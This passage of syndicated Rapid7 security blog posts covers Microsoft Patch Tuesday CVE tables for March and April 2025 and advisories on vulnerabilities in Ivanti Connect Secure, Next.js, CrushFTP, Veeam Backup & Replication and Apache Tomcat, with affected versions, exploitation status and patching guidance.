CVE-2025-27731	Microsoft OpenSSH for Windows Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24074	Microsoft DWM Core Library Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24073	Microsoft DWM Core Library Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24060	Microsoft DWM Core Library Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24062	Microsoft DWM Core Library Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-29812	DirectX Graphics Kernel Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-29809	Windows Kerberos Security Feature Bypass Vulnerability	No	No	7.1
CVE-2025-27491	Windows Hyper-V Remote Code Execution Vulnerability	No	No	7.1
CVE-2025-27475	Windows Update Stack Elevation of Privilege Vulnerability	No	No	7
CVE-2025-26649	Windows Secure Channel Elevation of Privilege Vulnerability	No	No	7
CVE-2025-27492	Windows Secure Channel Elevation of Privilege Vulnerability	No	No	7
CVE-2025-26640	Windows Digital Media Elevation of Privilege Vulnerability	No	No	7
CVE-2025-26681	Win32k Elevation of Privilege Vulnerability	No	No	6.7
CVE-2025-26651	Windows Local Session Manager (LSM) Denial of Service Vulnerability	No	No	6.5
CVE-2025-26635	Windows Hello Security Feature Bypass Vulnerability	No	No	6.5
CVE-2025-27735	Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability	No	No	6
CVE-2025-27736	Windows Power Dependency Coordinator Information Disclosure Vulnerability	No	No	5.5
CVE-2025-29808	Windows Cryptographic Services Information Disclosure Vulnerability	No	No	5.5
CVE-2025-26644	Windows Hello Spoofing Vulnerability	No	No	5.1

Windows Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29819	Windows Admin Center in Azure Portal Information Disclosure Vulnerability	No	No	6.2

Windows ESU vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-27477	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21205	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21221	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-21222	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-27481	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-26669	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	8.8
CVE-2025-27740	Active Directory Certificate Services Elevation of Privilege Vulnerability	No	No	8.8
CVE-2025-27737	Windows Security Zone Mapping Security Feature Bypass Vulnerability	No	No	8.6
CVE-2025-27480	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-26671	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-26663	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-26647	Windows Kerberos Elevation of Privilege Vulnerability	No	No	8.1
CVE-2025-26670	Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-27487	Remote Desktop Client Remote Code Execution Vulnerability	No	No	8
CVE-2025-21204	Windows Process Activation Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-26648	Windows Kernel Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27727	Windows Installer Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-29824	Windows Common Log File System Driver Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-26679	RPC Endpoint Mapper Service Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27741	NTFS Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27483	NTFS Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27733	NTFS Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-26688	Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27484	Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability	No	No	7.5
CVE-2025-26686	Windows TCP/IP Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-26680	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-27470	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-21174	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-26652	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-27485	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-27486	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-26668	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-26673	Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability	No	No	7.5
CVE-2025-27469	Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability	No	No	7.5
CVE-2025-26641	Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability	No	No	7.5
CVE-2025-27479	Kerberos Key Distribution Proxy Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-27473	HTTP.sys Denial of Service Vulnerability	No	No	7.5
CVE-2025-29810	Active Directory Domain Services Elevation of Privilege Vulnerability	No	No	7.5
CVE-2025-26665	Windows upnphost.dll Elevation of Privilege Vulnerability	No	No	7
CVE-2025-27478	Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability	No	No	7
CVE-2025-21191	Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability	No	No	7
CVE-2025-27732	Windows Graphics Component Elevation of Privilege Vulnerability	No	No	7
CVE-2025-26637	BitLocker Security Feature Bypass Vulnerability	No	No	6.8
CVE-2025-26664	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-26667	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-27474	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-21203	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-26672	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-26676	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-27738	Windows Resilient File System (ReFS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-21197	Windows NTFS Information Disclosure Vulnerability	No	No	6.5
CVE-2025-27471	Microsoft Streaming Service Denial of Service Vulnerability	No	No	5.9
CVE-2025-27742	NTFS Information Disclosure Vulnerability	No	No	5.5
CVE-2025-27472	Windows Mark of the Web Security Feature Bypass Vulnerability	No	No	5.4

Windows ESU Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-26687	Win32k Elevation of Privilege Vulnerability	No	No	7.5

Ivanti Connect Secure CVE-2025-22457 exploited in the wild

2025-04-03 Ryan Emmons

Post Syndicated from Ryan Emmons original https://blog.rapid7.com/2025/04/03/etr-ivanti-connect-secure-cve-2025-22457-exploited-in-the-wild/

Ivanti Connect Secure CVE-2025-22457 exploited in the wild

On Thursday, April 3, 2025, Ivanti disclosed a critical severity vulnerability affecting Ivanti Connect Secure, Pulse Connect Secure, Policy Secure, and ZTA Gateways. CVE-2025-22457 is a stack-based buffer overflow vulnerability that allows remote, unauthenticated attackers to execute code on the target device. Ivanti’s advisory indicates that CVE-2025-22457 is known to be exploited in the wild; Google’s Mandiant division attributes this activity to suspected China-nexus actors.

Ivanti’s advisory indicates that the vulnerability was “initially identified as a product bug” and patched in Ivanti Connect Secure version 22.7R2.6 (released February 11, 2025). Per Mandiant, CVE-2025-22457 is “a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability.” However, on April 3, Ivanti publicly acknowledged known exploitation in the wild of supported Ivanti Connect Secure and End-of-Support Pulse Connect Secure appliances for remote code execution in some customer environments.

Mitigation guidance

The following products and versions are vulnerable to CVE-2025-22457:

Ivanti Connect Secure 22.7R2.5 and prior
Pulse Connect Secure (End-of-Support) 9.1R18.9 and prior
Ivanti Policy Secure 22.7R1.3 and prior
ZTA Gateways 22.8R2 and prior

Ivanti has a full table of affected versions and corresponding solution estimates in their advisory.

A patch is available (initially released on February 11, 2025) for CVE-2025-22457 in Ivanti Connect Secure. However, the advisory states that patches for Ivanti Policy Secure and ZTA Gateways will not be available until April 21, 2025 and April 19, 2025, respectively. Pulse Connect Secure 9.1x reached End-of-Support on December 31, 2024 and won’t be patched. For the latest information, please refer to the Ivanti advisory.

Customers should apply the available Ivanti Connect Secure patch immediately, without waiting for a typical patch cycle to occur. Ivanti’s advisory notes that “Customers should monitor their external ICT and look for web server crashes. If your ICT result shows signs of compromise, you should perform a factory reset on the appliance and then put the appliance back into production using version 22.7R2.6.” Notably, ICT results may vary; a factory reset should be performed if exploitation is suspected, regardless of ICT results.

For the latest information, please refer to the vendor advisory.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-22457 in Ivanti Connect Secure with a vulnerability check expected to be available in today’s (April 3, 2025) content release.

Notable vulnerabilities in Next.js (CVE-2025-29927) and CrushFTP

2025-03-25 Calum Hutton

Post Syndicated from Calum Hutton original https://blog.rapid7.com/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/

Notable vulnerabilities in Next.js (CVE-2025-29927) and CrushFTP

Rapid7 is warning customers of notable vulnerabilities in Next.js, a React framework for building web applications, and CrushFTP, a file transfer technology that has previously been targeted by adversaries.

CVE-2025-29927 is a critical improper authorization vulnerability in Next.js middleware that could (theoretically) allow an attacker to bypass authorization checks in a Next.js application, if the authorization check occurs in middleware.
No CVE has been assigned (as of March 25, 2025) to an unauthenticated HTTP(S) port access vulnerability in CrushFTP file transfer software

Neither of the above vulnerabilities is known to have been exploited in the wild as of Tuesday, March 25, 2025. CrushFTP has previously been exploited in the wild for adversary access to (and exfiltration of) sensitive data.

CrushFTP unauthenticated HTTP(S) port access vulnerability (no CVE)

On Friday, March 21, 2025, file transfer software maker CrushFTP disclosed a new vulnerability to customers via email:

Notable vulnerabilities in Next.js (CVE-2025-29927) and CrushFTP

Note: While the email image above indicates only CrushFTP v11 is affected by the still-CVE-less (as of March 25) unauthenticated port access vulnerability, the extremely sparse vendor advisory indicates that both CrushFTP v10 and v11 are affected. According to the vendor, the issue is not exploitable if customers have the DMZ function of CrushFTP in place.

Mitigation guidance: File transfer technologies are high-value targets for ransomware and other adversaries looking to quickly gain access to and exfiltrate sensitive data. Per the email sent to CrushFTP customers on Friday, March 21, the vulnerability is fixed in CrushFTP v11.3.1 (and later). Customers should update immediately, without waiting for a regular patch cycle to occur.

Next.js CVE-2025-29927

CVE-2025-29927 stems from logic associated with how middleware is handled by the application — specifically, an attacker can provide a header in any request to bypass application middleware. Application middleware can perform any number of tasks, and it can stack so that multiple layers of middleware can be configured, with each able to modify the request/response passed to it. Common use cases of middleware include authentication/authorization, CSP validation, URL rewriting/redirection etc.

As the vulnerability affects an application framework, and the application middleware configuration can vary greatly, so too does the potential impact of exploiting the vulnerability. Based on Rapid7’s analysis, there is no ‘one-size-fits-all’ determination of risk/impact for CVE-2025-29927 (which is a common scenario for framework and library vulns). The most severe potential impact likely comes in the form of authentication bypass, but would still be highly application-dependent — the impact of bypassing authentication for a hobbyist “To do list” application is very different from theoretically bypassing authentication in an enterprise application utilising Next.js.

Organizations should consider whether their applications are relying solely on the middleware for authentication. It may be that the application uses middleware, but is just acting as a front end to back-end APIs that are dealing with server-side authentication logic. Bypassing the front-end Next.js middleware would not affect the back end’s ability to authenticate users.

As an example of how a more measured view can change the outlook, a Red Hat advisory for CVE-2025-29927 originally listed two products as affected: Red Hat Trusted Artifact Signer and Streams for Apache Kafka 2. Now these have been removed and classified as “Not affected,” presumably following further review. The advisory was updated with the following: “Red Hat Trusted Artifact Signer and Streams for Apache Kafka 2 are not affected by this vulnerability as they do not use Next.js for any authorization functionality.”

Mitigation guidance: Per the Next.js advisory, CVE-2025-29927 affects the following versions of Next.js:

>= 13.0.0, < 13.5.9 (fixed in 13.5.9)
>= 14.0.0, < 14.2.25 (fixed in 14.2.25)
>= 15.0.0, < 15.2.3 (fixed in 15.2.3)
>= 11.1.4, < 12.3.5 (fixed in 12.3.5)

Rapid7 customers

InsightVM and Nexpose customers who run CrushFTP on Linux can assess their exposure to the no-CVE unauthenticated HTTP(S) port access issue with a vulnerability check available in the Friday, March 21 content release.

Our InsightVM coverage team is assessing the feasibility of adding a vulnerability check for Next.js CVE-2025-29927. We will update this blog with further information no later than 6 AM ET on Wednesday, March 26, 2025.

Critical Veeam Backup & Replication CVE-2025-23120

2025-03-19 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/03/19/etr-critical-veeam-backup-and-replication-cve-2025-23120/

Critical Veeam Backup & Replication CVE-2025-23120

On Wednesday, March 19, 2025, backup and recovery software provider Veeam published a security advisory for a critical remote code execution vulnerability tracked as CVE-2025-23120. The vulnerability affects Backup & Replication systems that are domain joined. Veeam explicitly mentions that domain-joined backup servers are against security and compliance best practices, but in reality, we believe this is likely to be a relatively common configuration.

Veeam’s advisory indicates that the vulnerability is authenticated, though the CVSS score for CVE-2025-23120 is listed as 9.9. The advisory itself states that “authenticated domain users” can exploit the vulnerability but says little else — it’s possible that additional exploitation criteria will be published later on. According to Veeam, all supported versions of Backup & Replication are affected.

No public proof-of-concept exploit has been released (at time of this blog’s publication). Veeam Backup & Replication has a very large deployment footprint, and backup solutions are commonly targeted by threat actors. Veeam Backup & Replication should not be exposed to the internet and makes for a more effective internal attack vector than an external vector. Still, plenty of previous Veeam Backup & Replication vulnerabilities have been exploited in the wild, including by ransomware groups.

As we have mentioned previously, more than 20% of Rapid7 incident response cases in 2024 involved Veeam being accessed or exploited in some manner, typically once an adversary has already established a foothold in the target environment.

Mitigation guidance

Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds are vulnerable to CVE-2025-23120, per the vendor advisory.

Customers should update to the latest version of the software (12.3 build 12.3.1.1139) immediately, without waiting for a regular patch cycle to occur. Per the vendor, unsupported software versions were not tested but should be considered vulnerable.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-23120 with a vulnerability check expected to be available in tomorrow’s (Thursday, March 20) content release.

Apache Tomcat CVE-2025-24813: What You Need to Know

2025-03-19 Caitlin Condon

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/

Apache Tomcat CVE-2025-24813: What You Need to Know

Here at Rapid7, our usual bar for calling a vulnerability an emergent threat is either known exploitation at scale, or likelihood of exploitation at scale. Apache Tomcat CVE-2025-24813 fulfills neither of these criteria, despite a variety of news headlines alleging broad exploitation in the wild. Tomcat is widely deployed and has seen a number of severe vulnerabilities over the years that have had specific configuration dependencies for successful exploitation — this one follows the same pattern.

TL;DR: Patch, but there’s no need to panic. Here’s what you need to know:

CVE-2025-24813 is an unauthenticated remote code execution vulnerability in Apache Tomcat’s partial PUT feature disclosed on March 10, 2025. Fixed versions are available.
Under specific circumstances, successful exploitation allows attackers to execute code remotely on target systems via unsafe deserialization.
Vulnerability details and proof-of-concept (PoC) exploit code are both publicly available.
Based on our analysis and those of other research firms, the conditions required for successful exploitation appear to be specific, non-default, and uncommon.
CVE-2025-24813 has reportedly been exploited in the wild; however, Rapid7 has been unable to confirm any successful exploitation occurring against real-world production environments. We assess that “exploitation” in this context likely means unsuccessful exploit attempts rather than successful compromise of production systems.
Broad exploitation is unlikely given the specific vulnerable configuration requirements (see Exploitability requirements below).

Rapid7 researchers have tested publicly available PoC code and investigated the conditions Apache indicated were required for exploitation. Like other researchers, our team found that the vendor’s exploitable configuration information differs from what we observed during testing. Additionally, our team assessed the exploitable configuration to be relatively uncommon. Based on a GitHub code search query, only a small number of open-source Tomcat projects published publicly on GitHub are using write-enabled default servlet configurations (a pre-requisite for exploitation) — approximately 200, and most have fewer than 30 stars. Rapid7’s vulnerability research team has a full testing report here.

Exploitability requirements

Per the advisory, an attacker could view security sensitive files and/or inject content into those files if ALL of the following were true:

writes enabled for the default servlet (disabled by default)
support for partial PUT (enabled by default)
a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads (ed: Rapid7 and other researchers found this to be unnecessary for exploitation)
attacker knowledge of the names of security sensitive files being uploaded (ed: Rapid7 and other researchers found this to be unnecessary for exploitation)
the security sensitive files also being uploaded via partial PUT (ed: Rapid7 and other researchers found this to be unnecessary for exploitation)

An attacker could achieve remote code execution if ALL of the following were true:

writes enabled for the default servlet (disabled by default)
support for partial PUT (enabled by default)
application was using Tomcat’s file-based session persistence (ed: disabled by default) with the default storage location
application included a library that may be leveraged in a deserialization attack (ed: this is the case for many Java applications)

Mitigation guidance

The following versions of Apache Tomcat are affected:

Apache Tomcat 11.0.0-M1 to 11.0.2 (fixed in 11.0.3 or later)
Apache Tomcat 10.1.0-M1 to 10.1.34 (fixed in 10.1.35 or later)
Apache Tomcat 9.0.0.M1 to 9.0.98 (fixed in 9.0.99 or later)

For the latest information, please see the Apache Software Foundation’s advisory.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2025-24813 with pre-existing vulnerability checks.

Patch Tuesday – March 2025

2025-03-11 Adam Barnett

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/03/11/patch-tuesday-march-2025/

Patch Tuesday - March 2025

Microsoft is addressing 57 vulnerabilities this March 2025 Patch Tuesday, which is a similar volume to last month. However, Microsoft has evidence of in-the-wild exploitation for as many as six of the vulnerabilities published today, and CISA KEV already lists all of them. Microsoft is also aware of public disclosure for one other vulnerability. This is now the sixth consecutive month where Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today also sees the publication of six critical remote code execution (RCE) vulnerabilities. Ten browser vulnerabilities have already been published separately this month, and are not included in the total.

Win32 kernel subsystem: zero-day EoP

Older Windows products receive a patch today for CVE-2025-24983, which is an elevation of privilege vulnerability in the Win32 kernel subsystem. Microsoft is aware of exploitation in the wild. Since no user interaction is required, and successful exploitation leads to SYSTEM privileges, this isn’t one to ignore, even if the attacker must win a race condition, which does raise the bar for entry somewhat. Microsoft Windows 11 and Server 2019 onwards are not listed as receiving patches, so are presumably not vulnerable. It’s not clear why newer Windows products dodged this particular bullet; the Windows 32 subsystem is still presumably alive and well, since there is no apparent mention of its demise on the Windows client OS deprecated features list.

NTFS USB attack: zero-day information disclosure

Defense-in-depth practitioners have been limiting and monitoring access to USB ports for years now, and today brings further evidence for the value of locking things down, in the form of CVE-2025-24984, an information disclosure vulnerability in NTFS. Microsoft has evidence of exploitation in the wild, and functional exploit code. This vulnerability has a thus-far-unique combination of attributes: the attack vector is physical — the advisory describes a malicious USB drive as the delivery mechanism — and the weakness is CWE-532: Insertion of Sensitive Information into Log File. The advisory doesn’t quite join the dots, but successful exploitation appears to mean that portions of heap memory could be improperly dumped into a log file, which could then be combed through by an attacker hungry for privileged information. A relatively low CVSSv3 base score of 4.6 reflects the practical difficulties of real-world exploitation, but a motivated attacker can sometimes achieve extraordinary results starting from the smallest of toeholds, and Microsoft does rate this vulnerability as important on its own proprietary severity ranking scale.

NTFS VHD attack: zero-day information disclosure

If you like NTFS zero-day vulnerabilities, then today’s your lucky day! CVE-2025-24991 describes an out-of-bounds read in NTFS leading to information disclosure, specifically disclosure of small portions of heap memory. An attacker would need to trick a user into mounting a malicious VHD (Virtual Hard Disk), and that alone would be enough to trigger the vulnerability. The advisory does not explain how the attacker would exfiltrate the data, but clearly it’s practically possible, since Microsoft claims evidence of exploitation in the wild.

NTFS VHD attack: zero-day code execution

If you like NTFS zero-day vulnerabilities, but find information disclosure a bit pedestrian, then CVE-2025-24993 might be just what you’re after: exploitation requires that the user mount a malicious VHD, which then leads to heap-based buffer overflow, and the potential for local code execution. As is standard for a certain type of code execution vulnerability, the advisory somewhat awkwardly clarifies that the word “remote” in the title refers to the location of the attacker, and that the attack itself is carried out locally. The advisory doesn’t specify the context of code execution, but it’s a safe assumption that the end goal here is SYSTEM, since the attacker or a user must already execute code in the context of the user to trigger the vulnerability. The CVSSv3 base score of 7.8 reflects the potentially valuable reward for exploitation and low attack complexity, but is held back by the requirement for user interaction.

Fast FAT VHD attack: zero-day code execution

The Windows Fast FAT file system driver is the site of CVE-2025-24985, which Microsoft describes as a code execution vulnerability. Exploitation requires that the user mount a malicious VHD, leading to integer overflow or wraparound. Microsoft claims to have confirmed evidence of exploitation in the wild. The acknowledgments sections for CVE-2025-24984, CVE-2025-24991, CVE-2025-24993, and CVE-2025-24985 all credit an anonymous reporter. More than likely this is the same entity in each case, given the similarities between the four vulnerabilities.

Microsoft Management Console: zero-day security feature bypass

It’s been a few months since we saw a zero-day vulnerability in the Microsoft Management Console, but today brings us CVE-2025-26633, a security feature bypass for which Microsoft is aware of exploitation in the wild, as well as functional exploit code floating around somewhere out there on the internet. Successful exploitation leads to an outcome which isn’t specified by the advisory, but since the Microsoft Management Console has a feature set which includes the creation, hosting, and distribution of custom tools for the administrative management of both hardware and software for any supported version of Windows, it’s easy enough to see why an attacker might be interested. The advisory does mention that both preparation of the target environment and subsequent user interaction are required for successful exploitation, which would require the user to open a malicious file.

Microsoft Access: zero-day code execution

CVE-2025-26630 describes a remote-but-actually-local code execution vulnerability in Microsoft Access. Exploitation requires that the user open a malicious file. Microsoft is aware of public disclosure, but considers exploitation less likely. The weakness is our old friend CWE-416: Use After Free. Beyond that, the advisory is short on detail, but does claim that the Preview Pane is not an attack vector, so that’s a silver lining for this particular cloud. Going by the acknowledgements section of the advisory, it seems likely that relative newcomer Unpatched.ai intends to continue to shake things up, since they were also credited with a trio of zero-day Access vulnerabilities published back in January.

WSL magic email attack: critical RCE

The Windows Subsystem for Linux (WSL2) kernel receives a patch today for an arbitrary code execution vulnerability. Microsoft doesn’t claim evidence of public disclosure or in-the-wild exploitation for CVE-2025-24084, but does rank it as critical using its own proprietary severity ranking scale, which goes beyond what the already-significant CVSSv3 base score of 8.4 would suggest. The advisory describes multiple possible attack vectors, but in the worst case, there is no requirement for user interaction, since simply receiving a malicious email would be enough to trigger the vulnerability. The advisory does not clarify the context of code execution, but the magic email attack vector is alarming. Patch accordingly.

Malicious RDP server: critical RCE

How much do you trust the RDP server you’re about to connect to? An attacker in control of a malicious RDP server simply has to wait for a client vulnerable to CVE-2025-26645 to connect in order to achieve remote code execution on the client. Microsoft has assigned a CVSSv3 base score of 8.8 and a severity ranking of critical. While none of us should be connecting to RDP servers we’re not familiar with, an attacker might well see CVE-2025-26645 as a great opportunity for lateral movement and footprint expansion through the network.

Microsoft lifecycle update

In Microsoft product lifecycle news, SQL Server 2019 moved from mainstream support to extended support on 2025-02-28. Looking ahead, Visual Studio App Center will be retired on 2025-03-31, and Dynamics GP 2015 moves past the end of extended support on 2025-04-08.

Summary charts

Summary tables

Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-24049	Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability	No	No	8.4
CVE-2025-26627	Azure Arc Installer Elevation of Privilege Vulnerability	No	No	7
CVE-2025-21199	Azure Agent Installer for Backup and Site Recovery Elevation of Privilege Vulnerability	No	No	6.7
CVE-2025-24986	Azure Promptflow Remote Code Execution Vulnerability	No	No	6.5

Browser vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-26643	Microsoft Edge (Chromium-based) Spoofing Vulnerability	No	No	5.4
CVE-2025-1923	Chromium: CVE-2025-1923 Inappropriate Implementation in Permission Prompts	No	No	N/A
CVE-2025-1922	Chromium: CVE-2025-1922 Inappropriate Implementation in Selection	No	No	N/A
CVE-2025-1921	Chromium: CVE-2025-1921 Inappropriate Implementation in Media Stream	No	No	N/A
CVE-2025-1919	Chromium: CVE-2025-1919 Out of bounds read in Media	No	No	N/A
CVE-2025-1918	Chromium: CVE-2025-1918 Out of bounds read in PDFium	No	No	N/A
CVE-2025-1917	Chromium: CVE-2025-1917 Inappropriate Implementation in Browser UI	No	No	N/A
CVE-2025-1916	Chromium: CVE-2025-1916 Use after free in Profiles	No	No	N/A
CVE-2025-1915	Chromium: CVE-2025-1915 Improper Limitation of a Pathname to a Restricted Directory in DevTools	No	No	N/A
CVE-2025-1914	Chromium: CVE-2025-1914 Out of bounds read in V8	No	No	N/A

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-24043	WinDbg Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-24998	Visual Studio Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-25003	Visual Studio Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-26631	Visual Studio Code Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-24070	ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability	No	No	7

ESU Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-24056	Windows Telephony Service Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-24051	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-26645	Remote Desktop Client Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-24035	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-24045	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-24064	Windows Domain Name Service Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-21180	Windows exFAT File System Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24044	Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24993	Windows NTFS Remote Code Execution Vulnerability	Yes	No	7.8
CVE-2025-24985	Windows Fast FAT File System Driver Remote Code Execution Vulnerability	Yes	No	7.8
CVE-2025-24059	Windows Common Log File System Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24072	Microsoft Local Security Authority (LSA) Server Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24071	Microsoft Windows File Explorer Spoofing Vulnerability	No	No	7.5
CVE-2025-24983	Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability	Yes	No	7
CVE-2025-26633	Microsoft Management Console Security Feature Bypass Vulnerability	Yes	No	7
CVE-2025-24987	Windows USB Video Class System Driver Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-24988	Windows USB Video Class System Driver Elevation of Privilege Vulnerability	No	No	6.6
CVE-2025-24996	NTLM Hash Disclosure Spoofing Vulnerability	No	No	6.5
CVE-2025-24054	NTLM Hash Disclosure Spoofing Vulnerability	No	No	6.5
CVE-2025-24991	Windows NTFS Information Disclosure Vulnerability	Yes	No	5.5
CVE-2025-24992	Windows NTFS Information Disclosure Vulnerability	No	No	5.5
CVE-2025-24984	Windows NTFS Information Disclosure Vulnerability	Yes	No	4.6
CVE-2025-24055	Windows USB Video Class System Driver Information Disclosure Vulnerability	No	No	4.3
CVE-2025-21247	MapUrlToZone Security Feature Bypass Vulnerability	No	No	4.3
CVE-2024-9157	Synaptics: CVE-2024-9157 Synaptics Service Binaries DLL Loading Vulnerability	No	No	N/A

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-24077	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24079	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24057	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24080	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24083	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-26629	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24081	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24082	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-24075	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-26630	Microsoft Access Remote Code Execution Vulnerability	No	Yes	7.8
CVE-2025-24078	Microsoft Word Remote Code Execution Vulnerability	No	No	7

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-24084	Windows Subsystem for Linux (WSL2) Kernel Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-24061	Windows Mark of the Web Security Feature Bypass Vulnerability	No	No	7.8
CVE-2025-24048	Windows Hyper-V Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24050	Windows Hyper-V Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24995	Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24046	Kernel Streaming Service Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24066	Kernel Streaming Service Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24067	Kernel Streaming Service Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24076	Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-24994	Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-25008	Windows Server Elevation of Privilege Vulnerability	No	No	7.1
CVE-2025-24997	DirectX Graphics Kernel File Denial of Service Vulnerability	No	No	4.4

Multiple zero-day vulnerabilities in Broadcom VMware ESXi and other products

2025-03-04 Stephen Fewer

